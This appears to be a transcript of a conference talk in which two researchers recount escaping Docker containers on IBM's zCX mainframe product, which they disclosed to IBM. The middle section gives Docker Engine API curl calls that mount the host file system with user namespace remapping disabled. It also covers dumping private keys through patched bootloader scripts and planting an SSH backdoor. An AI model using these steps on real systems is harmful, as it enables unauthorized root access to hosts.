Hi, I'm Ian. I do container things. Hi, I'm Chad. I do mainframe things. And we're here to tell you a story today about some things we did together. We both live in Minneapolis, Minnesota, which is a cold, dark place where it's winter six months out of the year. Minnesotan hackers spend their long winters stuck inside doing deep dives, studying ancient arcana, and getting good at deep magic, which lends itself well to weird specializations. And that's how we ended up here.

It all began in spring 2019. Like many good things, it began with a shitpost. A person involved in DevOps said Kubernetes is the next mainframe. So, of course, I tagged Chad in it and said, what do you think? I'm not qualified to speak on mainframes. I'm about as qualified to speak on mainframes as I am on beekeeping. I think I've gotten a little better at it since. But anyway, a few days after that shitpost, we met at a local con for the first time in person and talked about our niche specializations, the similarities and differences between them. Our worlds don't usually overlap: the cultures are different, the timeline is different. I mean, mainframes have been around since the 50s, and Kubernetes has been around for, like, what, six or seven years? But our approaches had some similarities, and we both knew we had some knowledge in common. In the mainframe world, it's not uncommon to patch the systems maybe once or twice a year. And in the DevOps world, people do, like, multiple deploys a day. Culturally, it's really different. DevOps people are really open to new things, open source software, really excited about doing things quickly and doing new stuff. And mainframes, maybe not so much. No one would ever accuse the mainframe community of being excited about change. Fair enough.

Both of us had experience pulling things off that other people said were completely impossible in our respective fields. We'd figured out how to navigate uncharted territory. We'd taken apart technology without dedicated tooling, and with little or no prior art. We did have some things in common, though. We had shared knowledge of Linux hacking, which ended up becoming helpful for this project later, because containers are made out of Linux features, and mainframes use Unix file systems, too. We joked about whether or not we really could prove that guy wrong about Kubernetes being the next mainframe. But I didn't really think we would ever get to do our thing together, because, honestly, who puts containers on a mainframe? Well, the joke was on me, because just a few months later, in fall 2019, IBM announced z/OS Container Extensions, which we will be referring to from here on out as zCX. So we made it into a winter project. Joining forces and combining our very specific, particular sets of skills, we were able to become the first people on the planet to escape a container on a mainframe. And that was just getting started.

This talk is about how we did that. It's also about friendship, collaboration, cross-disciplinary skill sharing, and figuring out how to escape containers on the moon. But first, a couple of things. It would violate the laws of physics and math to fit all of the technical background that Ian and I have about our two niche disciplines into the amount of time that we have for this talk. We haven't figured out how to do that yet, but we're making a lot of progress, and we'll make a note of it for future talks. So we're not doing that today.
We encourage people that are interested in finding out more to check the resources in our reference sections, or if you're seeing this in person, come around and ask us a question. There are a lot of ways to attack this thing that we're not going to be covering today, and we reserve the right to not answer questions about those. If you're not here in person, and you're watching this virtually an hour later, we're around the interwebs too. You could probably find us on Twitter. Probably Twitter, yeah. Speaking of which, we disclosed this to IBM, and IBM sent us a formal statement about it. To our knowledge, this is unprecedented, so we figured we would share it here. Credit to IBM. Yeah, I've disclosed vulnerabilities to IBM in the past, and friends of mine have also disclosed vulnerabilities to IBM specifically for System Z, and they never get talked about publicly. This is fantastic. I really appreciate this, and I hope they do this again in the future. So, yeah, that's pretty cool. Anyway, let's get to it.

So, what is this thing? Containers on a mainframe? What? That's weird. First off, let's do some myth busting. Mainframes still exist. They're widely used, and the tech is more modern than you think. UNIX, in the form of UNIX System Services, has been ported to and running on the mainframe since the early 90s, and now there are actual containers that run inside an address space on IBM's most prevalent mainframe OS, z/OS. Every one of you used a mainframe today or, if you're here in person, on the way here. If you ran a credit card, if you went to an ATM, if you took an airplane, you used a mainframe. IBM's product name for this is zCX. I'll explain what that is, but first, let's do a super basic mainframe primer. The mainframe we're talking about and referring to today is IBM's flagship System Z. The operating system is known as z/OS. Sometimes, excuse me, sometimes it's still called MVS by its old-timers. It runs most of the mainframes on the planet, and it runs on a unique architecture called z/Architecture. Within this OS, the basic unit of user or process separation is known as an address space. zCX is a custom hypervisor, which emulates z/Architecture and runs in its own address space on z/OS. Atop zCX, there is a customized bare-bones Linux image running Docker containers. IBM hardened this image and created a custom Docker plugin to support a secure Docker base install, which allows the user to create and manage containers.

So, Ian, what's a container? What is a container? First of all, let's talk about what it's not. A container is not the same thing as a virtual machine. Containers don't have their own kernels or standalone resources, at least most of the time. Containers share resources with each other and with their hosts. And unlike a virtual machine, if you kill a container's process, you kill the entire container. Docker is the most common container engine, but it's not the only one, and they can vary pretty widely in implementation and behavior. Some of them even have hypervisors. zCX does use Docker, though, so that's what we're going to be talking about today. This isn't the first time Docker containers have been run on mainframe computers. Docker has been running on bare-metal Linux instances on mainframes for a minute, but that's just plain Linux. zCX is different because it's the first time containers have been run on z/OS. But what is a container anyway? Well, a container isn't really a thing at all. Containers are basically a set of native Linux features that are put together in order to isolate a process.
These features are cgroups and namespaces. Cgroups determine what resources a process is permitted to use, like CPU and memory. Namespaces determine what a process is permitted to see, like directories and other processes. Together, cgroups and namespaces make up what we call a container, which is really just an isolated process. Containers as a concept don't really exist in the Linux kernel. As far as the kernel is concerned, a container is no different than any other process running on the host. What this also means is that you can look at a container process like you could any other process on a Linux host. For this demo, we've already escaped to the zCX host, so we're looking from there. So let's run a container with the name honk and the command sleep 1312. The honk isn't really necessary here. I just wanted to honk at you. If we list our containers, we can then see that container running. We can see this or any other container from the outside by running a ps command, which will show us containers running on the host alongside other processes. This command output will give you the process ID, the user running it, the PID namespace number, and the command line arguments. If we want to take a look at the inside of the container, we can do so by looking at the /proc/<pid>/ns folder for the process ID of that container. We found the PID of the container we just created in the ps output we just ran. Let's take a closer look. If we take a look here, we can see the cgroup at the top and the other namespaces on the bottom. All processes on Linux are made up of these namespaces. As of kernel version 5.6, there's also a time namespace, but zCX runs an old-ass kernel, so this demo won't show you that one. Depending on the configuration and how the container was created, some of these namespaces might be shared with the host, and some might be unique to the container. We're not going to get into that here, but I recommend checking out the resources in the reference section to learn more. And that's it. Honestly, that might be the closest thing you're ever going to get to being able to actually look at a container, because that's all a container is: a process made of cgroups and namespaces.
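If you want to try that yourself, here's a minimal sketch of that demo on any ordinary Linux host running Docker. The ubuntu image and the <pid> placeholder are just illustrative; substitute whatever image you like and whatever PID the ps output gives you.

  docker run -d --name honk ubuntu sleep 1312   # start a container named honk
  docker ps                                     # the container, as Docker sees it
  ps -ef | grep 'sleep 1312'                    # the same container, as the host sees it: just a process
  ls -l /proc/<pid>/ns                          # its namespaces (mnt, pid, net, uts, ipc, user, cgroup...)
  cat /proc/<pid>/cgroup                        # and its cgroup membership

The whole point is that last pair of commands: there is no container object anywhere, just a process with namespaces and cgroups attached to it.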
Because containers do share resources with one another and their hosts, containers present a wide and varied attack surface, where if a container is compromised or misconfigured, containers can compromise each other and their hosts. I just think they're neat. They're fun to break, so let's talk about breaking some.

So, how do we break this thing, anyway? We approached zCX from both ends, using our respective knowledge and skill sets, and we ended up taking zCX completely apart, from the container side down into the mainframe and from the mainframe side up into the containers. But first, before we did anything else, Chad set up a lab in the cloud. It's true. It was a complicated lab, and it took a while to get it going. Let me explain. We had to build a cloud-based z/OS environment with the latest zCX code release. We used IBM's zPDT, which stands for Z Personal Development Tool. It's a virtualized platform that emulates Z hardware and runs atop Linux. On top of zPDT, we loaded the newest z/OS version, fully patched it, and were able to install and run zCX in the cloud. So it looks a little bit like this. At a hosting provider, we run a Linux instance. Running in that Linux instance is zPDT. On top of the zPDT hypervisor is z/OS. Within z/OS, there's an address space which runs the zCX hypervisor. On top of that runs a Linux instance, and in that runs Docker and our Docker containers. And that's our research environment. Simple. Something along those lines, yeah.

So, to really be able to attack this, we needed to level up our skill sets, and we started out by cross-training each other. We set aside time to share skills and get each other up to speed enough to be dangerous. Because, for me, I didn't really know how to do anything with a mainframe. And I couldn't spell Docker. But you're good at it now. So we needed a little bit of help getting each other up to speed, and we started doing that. First thing, I took Chad's evil mainframe class. Chad's a really good teacher. It's a really good training. If you ever get the chance, I recommend it. It's offered at such cons as you may or may not have heard of, like Black Hat, every once in a while. The training is multiple days long. It goes over the history of mainframes, how everything works, and there's a CTF at the end. It was really good. I had a really good time at it. Mainframes were brand new to me. I had never touched one before. I had never really had an occasion to. I'm used to bleeding-edge cloud native tech stacks. That old stuff never really comes into play for me at work. And while UNIX System Services felt familiar enough, the older stuff was wild. I had never seen or dealt with architecture like that before. It was so foreign to me, it might as well have been made on the moon. I learn in systems, so it took me a little while longer to ramp up at first, until I figured out how the whole thing worked together. Chad was very patient with this. I did get there eventually. I still call them 'frames, though.

Don't let Ian fool you. They picked up mainframes super fast, as well as anyone I've seen. The next thing was for me to train up on containers, and Ian helped me do the Secure Kubernetes CTF. I'd done only a little bit of work with Docker before, generally with CTFs and the like. It had always seemed like a little bit of magic to me. Working with Kubernetes and Docker in the Secure Kubernetes CTF really helped me make some sense out of it. It did bring me back to my beginning mainframe days. I mean, this is complex, with a really steep learning curve and a bunch of abstract concepts. I'd still put my overall understanding of Kubernetes at, like, 5% maybe, and containers somewhere in the neighborhood of maybe 30%. But working side by side with Ian has really helped me. They've always stopped to take the time to answer my questions with very detailed answers and examples. I definitely would not have wanted to embark on this without their guidance and patience. Don't let Chad fool you either. He took right to it, because he already had a base of Linux knowledge, and because containers are made out of Linux internals and container orchestration is made out of containers, he was up and running really fast. It was really fun to watch, and it was really fun to get to come up with a curriculum to train you, because I'm not a professional trainer. That wasn't really something I had done before. So it was cool to come up with one for you, to teach you everything. Anyway, after we had trained each other up, we took our new skills and our existing knowledge and started taking a look at the product. Working together, but separately, we looked at our respective spaces. I looked at the containers. And I looked at the mainframes. And we tried to figure out how to get into it.
On the mainframe end, I started with the initial provisioning of zCX. This is where the primary image files live, in the Unix subsystem on the mainframe. This is where you initiate zCX and provision it, and thus all of the artifacts that might be interesting to us are stored here. I uploaded these files used to build the root zCX file system to a Linux box, and then I could take them apart with the proper tools. I fired up my exotic hacking tools, like strings. I quickly discerned that the core of this image had two main parts: a whole bunch of bash scripts, and a bunch of Linux disk images. I extracted and examined these bash scripts alongside the job log, which shows messages as zCX launches. Immediately, I noticed that the scripts all had debugging outputs, but that none of the debugging outputs were showing up in the job log. What to do? Well, going back to the bash scripts, I looked, and there was this super helpful line near the top of the first bootloader script that gave away the secret: uncomment this line to enable debugging output. Thanks, developers. Who said being a hacker was difficult? All you have to do is just learn how to read. So I patched this script, put it back on the mainframe, and provisioned a new zCX. Fabulous. The job log spat out all of the debug for all of the bootloader stages. There were so many messages, though, about keys and decryption. My interest was piqued, and the hunt was on. I patched the bash script up again and started looking for the initial decryption keys. I used the tried-and-true hacker skill of echoing privatekey.pem, and I dumped the first of several encryption keys to the job log. However, I couldn't fully reverse the file system yet, because despite being able to echo these keys from the initial bootloader processes to the job log, I couldn't actually find the keys in the file system. It's a pretty complex setup. I could copy the keys one by one out of the job log, but this is a colossal pain in the ass. For the moment, I was stuck, and I turned it back over to Ian.
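To give a flavor of what that bootloader patching looked like: this is a purely illustrative sketch, not IBM's actual script — the variable and path names here are made up — but the technique really was this simple.

  # near the top of the first bootloader script, something like:
  #DEBUG=1                                  # "Uncomment this line to enable debugging output"
  DEBUG=1                                   # ...so we did, and every stage started talking in the job log

  # and later, the same trick to dump a key while the script is decrypting things:
  echo "$(cat "$KEY_DIR/privatekey.pem")"   # hypothetical path; writes the PEM out to the job log

That echo is the whole "exotic tooling" involved: the bootloader runs as part of provisioning, so anything it prints lands in the z/OS job log, where you can read it.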
So, looking at the container setup, I immediately saw some things that looked promising. First of all, the initial user was in the docker group, which is a security hole so fundamental that it literally comes with a warning label on every new install, even on z/OS. Somebody had to have seen this label and actively ignored it. Sweet. Wow, okay. So, sweet, this looks good. Moving on. The container setup that zCX has is Docker in Docker, which has known security holes, especially in certain configurations. There are a couple of approaches to Docker in Docker. It can mean running the Docker daemon inside a container, running inside another container, or it can mean running only the Docker CLI or the Docker SDK in a container and connecting it to the Docker daemon on the host. zCX has a setup like the latter one. The approach to Docker in Docker that zCX uses has a few different known drawbacks and some known security holes, because in this setup, the container running the Docker CLI can manipulate any containers running on the host. It can, for example, remove containers. It can create privileged containers that allow root-equivalent access to the host. And the zCX auth plugin, which was part of their security model, tried to account for this, but it didn't quite work entirely. Wait, what? I hadn't mentioned the zCX auth plugin yet. What's up with this? We'll get there.

So, I had looked at this and realized pretty quickly that it wasn't completely wide open. My first attempts at doing the most bog-standard things — okay, can I run a container as privileged in here? Can I execute a command as root? That kind of thing — were blocked by this Docker authorization plugin that they were using, called the zCX auth plugin. The zCX auth plugin did a few different things. It blocked privileged containers. It blocked executing commands as root. It also blocked mounting the host path as a read-write bind mount. Okay, fair enough. But I knew there had to be a way to get into this, because, honestly, just look at that setup. And I wanted to figure out how the thing worked. So, as I do, I went to the docs, and as they often do, the docs pointed the way. Quite literally: IBM helpfully listed all the security restrictions on the product, telling us all the things that we were not allowed to do because they adversely affected security features or might compromise the product. Well then, thanks, IBM. I appreciate the tips. I was clearly going to have to try all of those immediately. The language in the docs at the time claimed that it was not possible to become root or to access or modify the Linux host, but I knew that it was possible, because they gave away enough information about their system to tell me so. Here's why. For one thing, what the zCX auth plugin blocked gave me very specific error messages. For another thing, the commands they were blocking through the zCX auth plugin were very specific, which pointed to a specific set of system configurations, and also to the possibility that maybe they might be blocking through pattern matching. Really? This was like trying to prevent SQL injection by banning the string OR 1=1 without banning other things like, for example, AND 1=1, or, you know, parameterizing queries on the back end, or anything else that one might do about SQL injection. Even if it were possible to prevent all attacks by trying to block known bad syntax — and I think most people here can probably guess that it's not, because there are lots of ways to bypass that — it was also immediately clear upon looking at this that there were a lot of options they missed, many of which were security relevant. And in fact, going through the docs, it became obvious pretty quickly that maybe the folks who were developing this thing were a little newer to containers.

Another page in the documentation had a section on restrictions on bind mounts, which said that you couldn't mount host resources. Okay. I already knew that the plugin tried to block that one. It also mentioned that the /var/run Docker socket was read-only. Oh, that was the key to the front door. Let's talk about the Docker socket for a minute. The Docker socket is a known security hole if you leave it exposed to, for example, users in the docker group. This gives that user root-equivalent access to the host. And read-only for the Docker socket is not a security boundary, for a couple of reasons. One, you can make a whole volume read-only and all of the files in a folder read-only, and that doesn't actually affect sockets, because sockets don't work that way. Also, the Docker socket in particular has an API layer that you can make calls to, and an entire Docker Engine API of commands that you can execute while making those calls. And in the commands that the docs mentioned blocking, they didn't mention any of the syntax around the Engine API at all. I made a curl call creating a new container that mounted the host path as a read-write bind mount via Engine API syntax. And hey, it worked.
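For reference, talking to the Docker socket directly looks something like this: the standard Docker Engine API over a Unix socket, with the bind mount expressed in HostConfig.Binds. The image and container names here are just placeholders.

  # create a container that bind-mounts the host's / read-write at /host
  curl -s --unix-socket /var/run/docker.sock \
       -H 'Content-Type: application/json' \
       -d '{"Image":"ubuntu","Cmd":["sleep","1312"],"HostConfig":{"Binds":["/:/host:rw"]}}' \
       -X POST 'http://localhost/containers/create?name=escape'
  # then start it and go look at /host from inside
  curl -s --unix-socket /var/run/docker.sock -X POST 'http://localhost/containers/escape/start'

Same daemon, same capability as docker run -v /:/host:rw — the point is just that the pattern matching didn't account for this way of expressing it.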
So I knew that making calls could work, and that binds was an option they'd missed. Sweet. But when I tried chrooting out into the host file system, it didn't quite work the way that I wanted it to, because they had enabled user namespace remapping. What this means for my purposes is that once I was out of that namespace, even though it said I was root, I couldn't really do anything meaningful in that namespace. And they had locked things down real hard on that side, which was throwing weird permissions errors that I hadn't seen before. So that was kind of odd. But okay, maybe this one wasn't going to work. At this point, though, I knew I was getting somewhere.

I'm going to take a second here to explain user namespace remapping, because it's important. Linux namespaces provide isolation for running processes. They limit their access to system resources without the running process being aware of the limitations. You don't want to run your containers as the root user, generally. It is not a secure thing to do. But sometimes, for various system reasons, you get a container in which something has to run as root. So for those containers whose processes have to run as the root user within the container, you can remap this user, via user namespace remapping, to a less privileged user on the Docker host. The mapped user is assigned a range of UIDs which function within the namespace as normal UIDs from 0 to 65536, but they have no privileges on the host machine itself. This was why, even though I was theoretically running as UID 0, I couldn't really get anywhere. So, knowing that the API calls to the Engine API could work, but that user namespace remapping was cramping my style, I figured I'd try something else. I tried the user namespace host option through the API, because setting the user namespace to host breaks user namespace remapping. This option was blocked by the plugin when I had tried it before in a docker run command. But via the API, it worked. And this time, when I got in, I had full root access to all the host resources.
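Roughly what that looks like, end to end. The daemon-side config shown here is the stock Docker userns-remap setup, not necessarily IBM's exact configuration, and the image and names are placeholders; the interesting part is HostConfig.UsernsMode.

  # with user namespace remapping on, the daemon maps container root to an unprivileged UID range, e.g.:
  #   /etc/docker/daemon.json  ->  { "userns-remap": "default" }
  #   /etc/subuid              ->  dockremap:100000:65536
  # the same create call as before, but asking the daemon to skip remapping for this one container:
  curl -s --unix-socket /var/run/docker.sock \
       -H 'Content-Type: application/json' \
       -d '{"Image":"ubuntu","Cmd":["sleep","1312"],"HostConfig":{"Binds":["/:/host:rw"],"UsernsMode":"host"}}' \
       -X POST 'http://localhost/containers/create?name=escape2'
  # inside that container, UID 0 is the host's real root and /host is the host's real file system

The docker run spelling of that last field is --userns=host, which is exactly the sort of thing the plugin blocked on the command line; the API spelling of it was the gap.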
This system really needed more defense in depth. It appeared to have been built upon the assumption that no one could ever become root on the host, like they really believed their own propaganda. So nothing was really locked down on the back end past that point. Once you were in, and once you were root, you could really do whatever. And it was kind of fun, actually. I haven't had that much fun running around an environment since early Kubernetes, which was similarly wide open, and I hadn't gotten to do that in a while, since Kubernetes improved. So that was fun for me. Anyway, the first thing I did, once I had access to the host file system, was look inside the root folder, because, you know, why not? And in the root folder, there was another folder called root keys. Well, that sounded great. Obviously, there's going to be something interesting in root keys. So I took a look in there, and I found a private key called IBM encapsulation private dot pem. I didn't quite know what that was, but I figured Chad probably did. So I handed it to Chad, figuring it might be useful. Chad then took the key, reverse engineered the COBOL or something, and then we had a system to look at. Right. So it wasn't exactly COBOL, but it was pretty complex. So it was, like, a Fortran, right? Exactly. It was Fortran. Thank you. Ian had found the key that I was looking for. And once I had the key, I could finish reverse engineering the root file system, and then I was able to look at this in more depth.

The root file system bootloader process is a myriad of LUKS-encrypted file systems, initramfs file systems, wrapped encryption keys, and a whole bunch of scripts putting it all together. After parsing it all and reassembling the unencrypted file systems on my Linux box, I had a moment and realized what this was. This is IBM's Secure Service Container or, as it used to be called, z Appliance Container Infrastructure, zACI. IBM's Secure Service Container is an offering that they sell for LinuxONE, where it runs directly on bare-metal IBM mainframes as a secure appliance. The file systems were littered with these acronyms. It dawned on me that what they had done was take this, and this is why there was this wild maze of keys and encryption and scripts. They lifted this SSC, which normally has its initial decryption keys inside of a hardware security module, and ported the whole thing to software on a disk. IBM normally builds these as hardware enclaves, but it's harder to do that in the cloud. As it turns out, you can't actually lift and shift things into the sky.

What we were coming to find out is that the security model in zCX was a combination of mainframe and container security models, and a combination that worked in kind of interesting ways. Since containers share resources with each other and their hosts, securing containers requires a holistic approach. Any given container system is only as secure as any given part of its stack — really, every part of its stack. You have to have defense in depth in every layer of a container system. Containers are literally made out of layers, and that means that not only do you need to do it a little bit at a time, but you can. This is a somewhat different security model than the one on a mainframe. The mainframe security model is really granular. You can configure security on literally anything on the mainframe. However, it's also a monolith in its security model, and it can be very binary, like a light switch. Defense in depth on the mainframe can be really difficult: any security configuration errors can allow somebody to basically bypass all the security controls, because you screwed up one or two really key, important things. Mainframes are wild. They are wild. So the differing approaches of these two security models came into play with the way that zCX got built, and the two combined in some somewhat unexpected ways. And the way they got combined led to some somewhat unexpected behavior for both of us. So we worked together, passing things back and forth. When either of us ran into the limits of our knowledge, or saw something that didn't really make sense in the context we were used to, we would pass the problem to the other person, who would recognize it from their knowledge and context, and then we would do it again.

So, back to the container system. I'm in there. I have full root access, but I was having a hard time understanding some behavior that I was running into. The Docker service kept throwing these weird systemd errors I hadn't seen before, and my debugging tools weren't really helping me figure out why. I wasn't really sure what was up with this. Meanwhile, on the mainframe side of things, I found this directory for systemd services under /etc that had these weird permissions on it: 644, which, as any of you Linux people would know, is a kind of odd permission set for a directory, because the execute bit isn't set. I found this because I was copying it from a Linux box to another directory, and my copy command threw an error because it couldn't copy that directory. Why would you want a non-executable directory? I'd never seen this before. I showed it to Ian with a comment about how strange I thought this was.
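If you've never run into a directory without the execute bit, here's a quick toy example of why it's so odd — as an unprivileged user on any Linux box:

  mkdir demo && touch demo/file
  chmod 644 demo       # read and write bits, but no execute (traverse) bit
  cd demo              # fails with "Permission denied": you can't enter the directory
  ls -l demo           # you can read the entry names, but not stat them: "cannot access 'demo/file'"
  cp -r demo /tmp/     # and recursive copies throw errors, which is how this got noticed in the first place

The read bit on a directory lets you list names; the execute bit is what lets you actually traverse into it and touch anything inside.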
Oh, huh, okay. This partly explained the errors that I had been getting with the Docker service that I hadn't been able to figure out — sort of. The permissions bit made sense in a container context. 644 is actually a pretty standard permission set for the Docker service, for compliance reasons, but this particular service didn't quite act the way that I would normally expect it to. The Docker service interacted with several other systemd services. One of the services it was interacting with was called zcxauthplugin.service. So I took a look at that. I wanted to know how this plugin worked, and could we disable it? Docker authorization plugins aren't super commonly used, but the ones that I had seen, which were open source, generally behaved in pretty similar ways. This authorization plugin was different. It was closed source, and it interacted with systemd as a service in a way that I hadn't seen before. It kept making these calls back and forth and running them against a list of magic text strings. What the fuck? This wasn't common behavior in a container context at all. I had never seen such a thing. Ian explained this to me, and it occurred to me that what was going on here might have a corollary in the mainframe world. Specifically, mainframe exits. Let me explain.

So, within z/OS, there's a concept of an exit. What an exit is used for is if you want to do some really specific customization to some part of the system. An exit is literally a program that you write, usually in assembler or C, maybe C++, that is called from an API in some kind of system routine. So the way it works is — let's take an example, a password processing routine. Ian's going to change their password on the mainframe to Sparkle. So they type in the password Sparkle. The mainframe then says, okay, that's fine, but I see that there's an exit defined for password compliance, so it will call the program that I wrote. And in my program, the mainframe exit for password policy, I'm going to check all kinds of things. Is this word part of the dictionary list? Is it the month? Is it the current year? Is it Ian's name? Things like that, that the system wouldn't normally check. And if it's okay, I'm going to pass back a return code that says, that's fine, Ian can use Sparkle. Or, if it's not good, I'm going to say, no good, and make them change their password to something else. So I explained this to Ian. I said, I think what's happening here is that programmers who know how to write exits to modify and control system behavior have essentially written an exit, in the form of the zCX auth plugin, and that's how they're trying to control the security of this product. Wild.

Meanwhile, I was also looking at the zCX auth plugin, but I was looking at the binary. And the first thing that I noticed was that it was huge. I mean, listen, normally on mainframes, things are built with really tight assembly code or C code. The binaries, even for super complex mainframe systems, are small for this reason. Take, for example, the nucleus on a mainframe, which is kind of like the kernel — the core bit that tells everybody what to do. It's maybe 50 megs on the mainframe. And the zCX auth plugin — just this one little plugin — is six megs.
I started dumping it and looking at it with a hex editor and a disassembler, and there are all kinds of calls in here to things that have nothing whatsoever to do with Docker or security. And I was like, what is going on here with this thing? So I brought it back to Ian and I said, what is this? What's happening here? Here's what I knew. It was a Go binary. They are thick like that. They have a lot of dependencies. They make a lot of extra calls. That's normal for Go. At one point, I tried to docker pull the image for golang and I crashed our entire lab for disk space. Oops. I'm just unfamiliar with these kinds of size constraints, because I'm used to Go being like that. And so, although I recognized the Go patterns in the code, and that made sense to me, some of what that code was doing looked kind of weird. It looked unfamiliar in a way that, at this point, I had learned probably meant it was doing something weirdly mainframe-specific, despite being the kind of Golang thing that I might otherwise be used to seeing.

So at this point, I think we all knew this was clearly going to keep happening, and we were going to need to get a deeper look at the system together. But to get into the system as deep as we wanted to, we were going to need persistence and tools. So we made a lab version of zCX, and we ripped out all of the security features that IBM had left behind for us. We disabled the zCX auth plugin. We disabled userns-remap. We made all of the read-only mounts into read-write mounts. We stored this file system onto a mainframe data set. We added a debugger. We got APT up and running so we could update the software and install new applications and programs. And I even — I'm very proud of this — figured out how to make SSH run on the root file system, by copying the sshd binaries and the corresponding libraries out of the Docker overlay file systems and running them in the root file system. So we had a direct backdoor into the root file system and could commence doing a little bit deeper research. We're still doing more with that.

So where do we go from here? Well, we have a to-do list. We're still working on this project. We have a couple of obvious points to attack that we've already gathered some information about, and maybe some less obvious ones that we won't be talking about here. One of my favorite things is disassembling and reverse engineering code, so disassembling the zCX auth plugin is something that I'm absolutely looking forward to. However, it's written in Go, and it's on an architecture, using tools that were not really designed for that architecture. Let me explain. If you look at any of the open-source tooling designed for the mainframe, what you'll see is the architecture listed not as z/Architecture but as s390x. They are the same thing. In open-source parlance, s390x equals z/Architecture. And even though I have things like objdump and GDB and that sort of thing, when I disassemble these binaries, I'm going to end up with Z assembler code — not x86, not ARM, but Z assembler code. So this is going to make it quite a bit more complicated to get through. But doing this, I think, is going to open up some obvious pointers to other security vulnerabilities.
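As a rough illustration of what that looks like from a Linux box — the binary name here is a placeholder, and on Debian-ish distros the cross binutils live in a separate package:

  file zcxauthplugin
  #   something like: ELF 64-bit MSB executable, IBM S/390, ... Go BuildID=...
  # a native objdump may not know that target, so use the s390x cross tools
  # (e.g. the binutils-s390x-linux-gnu package):
  s390x-linux-gnu-objdump -d zcxauthplugin | less    # z/Architecture assembly, not x86, not ARM

Same drill for GDB: you either build it with s390x target support or use something like gdb-multiarch, and either way you're reading Z assembler at the end of it.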
s390x kept coming up and kept kind of throwing wrenches at things throughout this process, because open-source tooling sometimes supports s390x, but a lot of the time it doesn't. And honestly, for really valid reasons. Open-source developers, who are often working for free, are like, I don't work for IBM. Why would I work on something that is specific to IBM architecture? They're not paying me to do this. If you want people to do this, you can hire people to do this. And therefore, a lot of tools just aren't supported. That kept coming up as I kept reaching for some open-source tool that I was used to using and having it go, no, and fail with some sort of terrible architecture error, like, seven layers down the stack. It was kind of cool for learning, and also a pain in the ass.

Anyway, the real goal here for us would be a full hypervisor escape, which we believe can be done. zCX runs in an address space within z/OS, and that address space runs as authorized. Let me explain what this means. In a mainframe context, running as authorized means something specific. It's like security through the file system. Imagine if you had a folder on Linux where anything that was in that folder automatically ran as UID 0, as root, and not only that, had root access to everything else in the system. That's actually how mainframe authorized address spaces work, which is wild. And what this means is that if we can get code execution in that address space — which, frankly, we believe that we can — we will be able to own the entire mainframe server. All of it. Everything. We already know that there are direct memory links. IBM helpfully provided us this hideously ugly diagram in Comic Sans telling us so, and we also know because of this demo.

Okay, I'm just going to show you a quick demo of what we think might be possible in the future. We've done a little research on the shared memory links between zCX and z/OS. We know they exist. They're in some of the diagrams, and the documentation talks about them. But we found one particular instance we'd like to show you now. So this demo is basically just giving you kind of a window into what might be possible, by way of a fun demonstration. So we log into the backdoor on our zCX instance. This is an SSH server that I booted up that's just running at the root level of the zCX instance now, so we don't have to bother going back in through Docker and escaping down to the root instance. We're just running an SSH daemon directly from it now, to get in and out as part of our research environment. And I'm going to run some hackery commands from this zCX instance that I'm not going to show today. And just to give you an example of what we think is possible, let's log back into the mainframe system. So I'm going to log in with my TSO ID onto our mainframe. And once I'm into TSO, I'm going to launch ISPF, which is the green screen that everybody associates with mainframes and is still probably the primary means of accessing the mainframe. And I'm going to go into SDSF, which is where all the output for all the jobs is stored, and look at one of our active jobs, which is named MOON, which is the zCX server that we're looking at. So if I scroll down in this job log, and I go all the way down to the bottom, you can see that there is definitely a connection between the commands that I just executed in zCX and my ability to write to memory inside of z/OS, placing the goose there at the end of that job log. So the demonstration here was basically just to show you that what we have done is we've gone down through the Docker engine into the root Linux container.
That's what's labeled here as the Linux kernel, and we know there are memory connections from that kernel, through the zCX hypervisor, into z/OS. And so our next project is really to try to figure out how to take advantage of that, do memory overwrites, and then gain full access to an authorized address space within z/OS. Doing so would give us access to all of the data, the programs, and everything running on z/OS, which is ultimately the end goal.

We couldn't wrap this up without discussing what we've learned. None of this, or any of the future work that we will do, would be possible without the sparkling partnership between Ian and myself. And I have to add a side note: I think I've said "sparkling" more in this talk than I've ever said it in my entire life when I wasn't ordering a drink. It's all the glitter I left everywhere. It is indeed. There's a lot of glitter. Here's what I learned. In my niche world, I'm often the expert that people come to for input. I like this. I worked hard for it. I like the recognition that comes with it. I admit, I find it hard to ask for help, or to admit that I don't really know where to start on a thing, especially if it's something that I could probably figure out on my own eventually, but maybe it would take me six months or a year. I don't know if this resonates with any of you, but collaborating on a thing like this means sharing the spotlight, right? Letting somebody else guide you, and being humble. This is hard. This is hard for me, and maybe it's hard for some of you, but it's been a really good experience. It's been really good for me. I'd like to encourage all of you watching this to do this too. Be vulnerable. Ask for help. Be humble, even when it's hard. It's not only okay, but the outcome can, and likely will, be better than going it alone.

I've learned things too. I'm more used to asking for help. I work collaboratively a lot. I'm a member of a hacker crew called SIG-Honk. We work together all the time, and we admit when we don't know things, and ask for help, and do that a lot. So I was more used to that. What I wasn't used to was working with somebody whose skill set overlaps only a little with mine, because usually when I do collaborative work, I do it with other container people. And it's been really awesome to get to work with somebody who has knowledge that is so new to me and so different from mine. I've gotten to learn so much from you, and it's been great. And I felt really inspired by that — I think we both have — about what kinds of possibilities this could lead to for people. Because we don't always think about this, right? We hang out with people in our bubble. Maybe they do the same kinds of things we do. Maybe they're a lot like us. But if we start working more closely with people who are really different from us, either in their skill set or just in the way that they are, the way that they grew up, the way that they live, you can learn a whole lot from doing that, in a way that is really awesome. And if we all start doing that more, we can learn more from each other, and we can build and break things more amazingly — things that wouldn't have been possible before — if we can work across chasms like that. So that's been really sweet. And we want to encourage you all to do that too, because what can you do together? What can you build? What can you break? There are infinite possibilities, and we really want to see what you can do with that. We want to see what we all can do with that.
I don't think we do it enough as an industry. So let's find each other. Let's make things happen. You and a small crew of committed friends can change the world. The secret is to really begin. Thank you. Thank you.